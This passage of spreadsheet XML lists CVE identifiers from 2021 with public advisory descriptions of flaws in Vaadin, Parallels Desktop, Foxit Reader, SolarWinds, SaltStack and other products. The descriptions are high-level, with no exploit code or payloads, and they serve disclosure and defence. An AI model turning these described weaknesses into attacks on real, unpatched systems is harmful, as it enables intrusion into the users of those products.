    <t>Non-constant-time comparison of CSRF tokens in UIDL request handler in com.vaadin:vaadin-server versions 7.0.0 through 7.7.23 (Vaadin 7.0.0 through 7.7.23), and 8.0.0 through 8.12.2 (Vaadin 8.0.0 through 8.12.2) allows attacker to guess a security token via timing attack</t>
  </si>
  <si>
    <t>CVE-2021-31404</t>
  </si>
  <si>
    <t>Non-constant-time comparison of CSRF tokens in UIDL request handler in com.vaadin:flow-server versions 1.0.0 through 1.0.13 (Vaadin 10.0.0 through 10.0.16), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.4.6 (Vaadin 14.0.0 through 14.4.6), 3.0.0 prior to 5.0.0 (Vaadin 15 prior to 18), and 5.0.0 through 5.0.2 (Vaadin 18.0.0 through 18.0.5) allows attacker to guess a security token via timing attack.</t>
  </si>
  <si>
    <t>CVE-2021-31405</t>
  </si>
  <si>
    <t>Unsafe validation RegEx in EmailField component in com.vaadin:vaadin-text-field-flow versions 2.0.4 through 2.3.2 (Vaadin 14.0.6 through 14.4.3), and 3.0.0 through 4.0.2 (Vaadin 15.0.0 through 17.0.10) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.</t>
  </si>
  <si>
    <t>CVE-2021-31406</t>
  </si>
  <si>
    <t>Non-constant-time comparison of CSRF tokens in endpoint request handler in com.vaadin:flow-server versions 3.0.0 through 5.0.3 (Vaadin 15.0.0 through 18.0.6), and com.vaadin:fusion-endpoint version 6.0.0 (Vaadin 19.0.0) allows attacker to guess a security token for Fusion endpoints via timing attack.</t>
  </si>
  <si>
    <t>CVE-2021-31407</t>
  </si>
  <si>
    <t>Vulnerability in OSGi integration in com.vaadin:flow-server versions 1.2.0 through 2.4.7 (Vaadin 12.0.0 through 14.4.9), and 6.0.0 through 6.0.1 (Vaadin 19.0.0) allows attacker to access application classes and resources on the server via crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-31408</t>
  </si>
  <si>
    <t>Authentication.logout() helper in com.vaadin:flow-client versions 5.0.0 prior to 6.0.0 (Vaadin 18), and 6.0.0 through 6.0.4 (Vaadin 19.0.0 through 19.0.3) uses incorrect HTTP method, which, in combination with Spring Security CSRF protection, allows local attackers to access Fusion endpoints after the user attempted to log out.</t>
  </si>
  <si>
    <t>CVE-2021-31409</t>
  </si>
  <si>
    <t>Unsafe validation RegEx in EmailValidator component in com.vaadin:vaadin-compatibility-server versions 8.0.0 through 8.12.4 (Vaadin versions 8.0.0 through 8.12.4) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.</t>
  </si>
  <si>
    <t>CVE-2021-3141</t>
  </si>
  <si>
    <t>In Unisys Stealth (core) before 6.0.025.0, the Keycloak password is stored in a recoverable format that might be accessible by a local attacker, who could gain access to the Management Server and change the Stealth configuration.</t>
  </si>
  <si>
    <t>CVE-2021-31410</t>
  </si>
  <si>
    <t>Overly relaxed configuration of frontend resources server in Vaadin Designer versions 4.3.0 through 4.6.3 allows remote attackers to access project sources via crafted HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-31411</t>
  </si>
  <si>
    <t>Insecure temporary directory usage in frontend build functionality of com.vaadin:flow-server versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds.</t>
  </si>
  <si>
    <t>CVE-2021-31412</t>
  </si>
  <si>
    <t>Improper sanitization of path in default RouteNotFoundError view in com.vaadin:flow-server versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows network attacker to enumerate all available routes via crafted HTTP request when application is running in production mode and no custom handler for NotFoundException is provided.</t>
  </si>
  <si>
    <t>CVE-2021-31414</t>
  </si>
  <si>
    <t>The unofficial vscode-rpm-spec extension before 0.3.2 for Visual Studio Code allows remote code execution via a crafted workspace configuration.</t>
  </si>
  <si>
    <t>CVE-2021-31417</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.4-47270. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-12131.</t>
  </si>
  <si>
    <t>CVE-2021-31418</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.4-47270. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-12221.</t>
  </si>
  <si>
    <t>CVE-2021-31419</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.4-47270. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-12136.</t>
  </si>
  <si>
    <t>CVE-2021-31420</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.0-48950. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-12220.</t>
  </si>
  <si>
    <t>CVE-2021-31421</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to delete arbitrary files on affected installations of Parallels Desktop 16.1.1-49141. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to delete arbitrary files in the context of the hypervisor. Was ZDI-CAN-12129.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2021-31422</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.1-49141. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the e1000e virtual device. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-12527.</t>
  </si>
  <si>
    <t>CVE-2021-31423</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Toolgate component. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-12528.</t>
  </si>
  <si>
    <t>CVE-2021-31424</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Open Tools Gate component. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-12848.</t>
  </si>
  <si>
    <t>CVE-2021-31425</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.2-49151. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Parallels Tools component. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel on the target guest system. Was ZDI-CAN-12790.</t>
  </si>
  <si>
    <t>CVE-2021-31426</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 16.1.2-49151. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Parallels Tools component. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel on the target guest system. Was ZDI-CAN-12791.</t>
  </si>
  <si>
    <t>CVE-2021-31427</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute low-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the Open Tools Gate component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13082.</t>
  </si>
  <si>
    <t>CVE-2021-31428</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the IDE virtual device. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13186.</t>
  </si>
  <si>
    <t>CVE-2021-31429</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the IDE virtual device. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13187.</t>
  </si>
  <si>
    <t>CVE-2021-31430</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the IDE virtual device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13188.</t>
  </si>
  <si>
    <t>CVE-2021-31431</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the IDE virtual device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13189.</t>
  </si>
  <si>
    <t>CVE-2021-31432</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.5-47309. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the IDE virtual device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the hypervisor. Was ZDI-CAN-13190.</t>
  </si>
  <si>
    <t>CVE-2021-31433</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.931. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ARW files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12333.</t>
  </si>
  <si>
    <t>CVE-2021-31434</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.931. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPM files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12377.</t>
  </si>
  <si>
    <t>CVE-2021-31435</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.931. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CMP files. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12331.</t>
  </si>
  <si>
    <t>457</t>
  </si>
  <si>
    <t>CVE-2021-31436</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.931. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of SGI files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12376.</t>
  </si>
  <si>
    <t>CVE-2021-31437</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.931. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12384.</t>
  </si>
  <si>
    <t>CVE-2021-31438</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3.6.6.931. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12443.</t>
  </si>
  <si>
    <t>CVE-2021-31439</t>
  </si>
  <si>
    <t>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation Manager. Authentication is not required to exploit this vulnerablity. The specific flaw exists within the processing of DSI structures in Netatalk. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12326.</t>
  </si>
  <si>
    <t>CVE-2021-3144</t>
  </si>
  <si>
    <t>In SaltStack Salt before 3002.5, eauth tokens can be used once after expiration. (They might be used to run command against the salt master or minions.)</t>
  </si>
  <si>
    <t>CVE-2021-31440</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.11.15. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs prior to executing them. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-13661.</t>
  </si>
  <si>
    <t>CVE-2021-31441</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3101.</t>
  </si>
  <si>
    <t>CVE-2021-31442</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U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13239.</t>
  </si>
  <si>
    <t>CVE-2021-31443</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576.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3240.</t>
  </si>
  <si>
    <t>CVE-2021-31444</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576.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3241.</t>
  </si>
  <si>
    <t>CVE-2021-31445</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576.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3244.</t>
  </si>
  <si>
    <t>CVE-2021-31446</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576.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3245.</t>
  </si>
  <si>
    <t>CVE-2021-31447</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576.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3269.</t>
  </si>
  <si>
    <t>CVE-2021-31448</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576.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3273.</t>
  </si>
  <si>
    <t>CVE-2021-31449</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U3D objects embedded in PDF files. The issue results from the lack of validating the existence of an object prior to performing further free operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13280.</t>
  </si>
  <si>
    <t>CVE-2021-3145</t>
  </si>
  <si>
    <t>In Ionic Identity Vault before 5, a local root attacker on an Android device can bypass biometric authentication.</t>
  </si>
  <si>
    <t>CVE-2021-31450</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XFA forms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13084.</t>
  </si>
  <si>
    <t>CVE-2021-31451</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3089.</t>
  </si>
  <si>
    <t>CVE-2021-31452</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XFA forms. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13091.</t>
  </si>
  <si>
    <t>CVE-2021-31453</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XFA Forms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13092.</t>
  </si>
  <si>
    <t>CVE-2021-31454</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the Decimal element. A crafted leadDigits value in a Decimal element can trigger an overflow of a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current process. Was ZDI-CAN-13095.</t>
  </si>
  <si>
    <t>CVE-2021-31455</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XFA forms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13100.</t>
  </si>
  <si>
    <t>CVE-2021-31456</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3102.</t>
  </si>
  <si>
    <t>CVE-2021-31457</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3147.</t>
  </si>
  <si>
    <t>CVE-2021-31458</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3150.</t>
  </si>
  <si>
    <t>CVE-2021-31459</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XFA Forms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13162.</t>
  </si>
  <si>
    <t>CVE-2021-3146</t>
  </si>
  <si>
    <t>The Dolby Audio X2 (DAX2) API service before 0.8.8.90 on Windows allows local users to gain privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31460</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processing of XFA templates. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13096.</t>
  </si>
  <si>
    <t>CVE-2021-31461</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the handling of app.media objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process Was ZDI-CAN-13333.</t>
  </si>
  <si>
    <t>CVE-2021-31462</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.3.37598.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3572.</t>
  </si>
  <si>
    <t>CVE-2021-31463</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.3.37598.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3573.</t>
  </si>
  <si>
    <t>CVE-2021-31464</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.3.37598.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3574.</t>
  </si>
  <si>
    <t>CVE-2021-31465</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13582.</t>
  </si>
  <si>
    <t>CVE-2021-31466</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13583.</t>
  </si>
  <si>
    <t>CVE-2021-31467</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D files embedded in PDF document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3621.</t>
  </si>
  <si>
    <t>CVE-2021-31468</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D files embedded in PDF documents. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13620.</t>
  </si>
  <si>
    <t>CVE-2021-31469</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576.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2936.</t>
  </si>
  <si>
    <t>CVE-2021-31470</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U3D objects in PDF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12947.</t>
  </si>
  <si>
    <t>CVE-2021-31471</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Reader 10.1.1.37576. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF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2955.</t>
  </si>
  <si>
    <t>CVE-2021-31472</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.1.1.37576. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13011.</t>
  </si>
  <si>
    <t>CVE-2021-31473</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the browseForDoc function. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13523.</t>
  </si>
  <si>
    <t>CVE-2021-31474</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of SolarWinds Network Performance Monitor 2020.2.1. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SolarWinds.Serialization library. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-12213.</t>
  </si>
  <si>
    <t>CVE-2021-31475</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of SolarWinds Orion Job Scheduler 2020.2.1 HF 2. Authentication is required to exploit this vulnerability. The specific flaw exists within the JobRouterService WCF service. The issue is due to the WCF service configuration, which allows a critical resource to be accessed by unprivileged users. An attacker can leverage this vulnerability to execute code in the context of an administrator. Was ZDI-CAN-12007.</t>
  </si>
  <si>
    <t>CVE-2021-31476</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.1.3.37598. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XFA templates. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13531.</t>
  </si>
  <si>
    <t>CVE-2021-31477</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of GE Reason RPV311 14A03. Authentication is not required to exploit this vulnerability. The specific flaw exists within the firmware and filesystem of the device. The firmware and filesystem contain hard-coded default credentials. An attacker can leverage this vulnerability to execute code in the context of the download user. Was ZDI-CAN-11852.</t>
  </si>
  <si>
    <t>CVE-2021-31478</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PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12633.</t>
  </si>
  <si>
    <t>CVE-2021-31479</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PDF files. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12634.</t>
  </si>
  <si>
    <t>CVE-2021-3148</t>
  </si>
  <si>
    <t>An issue was discovered in SaltStack Salt before 3002.5. Sending crafted web requests to the Salt API can result in salt.utils.thin.gen_thin() command injection because of different handling of single versus double quotes. This is related to salt/utils/thin.py.</t>
  </si>
  <si>
    <t>CVE-2021-31480</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XF files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12654.</t>
  </si>
  <si>
    <t>CVE-2021-31481</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SLDPRT files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12659.</t>
  </si>
  <si>
    <t>CVE-2021-31482</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12708.</t>
  </si>
  <si>
    <t>CVE-2021-31483</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the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12709.</t>
  </si>
  <si>
    <t>CVE-2021-31484</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12710.</t>
  </si>
  <si>
    <t>CVE-2021-31485</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the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12711.</t>
  </si>
  <si>
    <t>CVE-2021-31486</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12712.</t>
  </si>
  <si>
    <t>CVE-2021-31487</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12715.</t>
  </si>
  <si>
    <t>CVE-2021-31488</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12716.</t>
  </si>
  <si>
    <t>CVE-2021-31489</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12717.</t>
  </si>
  <si>
    <t>CVE-2021-3149</t>
  </si>
  <si>
    <t>On Netshield NANO 25 10.2.18 devices, /usr/local/webmin/System/manual_ping.cgi allows OS command injection (after authentication by the attacker) because the system C library function is used unsafely.</t>
  </si>
  <si>
    <t>CVE-2021-31490</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12718.</t>
  </si>
  <si>
    <t>CVE-2021-31491</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12719.</t>
  </si>
  <si>
    <t>CVE-2021-31492</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12720.</t>
  </si>
  <si>
    <t>CVE-2021-31493</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XF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13304.</t>
  </si>
  <si>
    <t>CVE-2021-31494</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XF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13305.</t>
  </si>
  <si>
    <t>CVE-2021-31495</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XF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13307.</t>
  </si>
  <si>
    <t>CVE-2021-31496</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XF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13308.</t>
  </si>
  <si>
    <t>CVE-2021-31497</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rocessing of DWG files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13311.</t>
  </si>
  <si>
    <t>CVE-2021-31498</t>
  </si>
  <si>
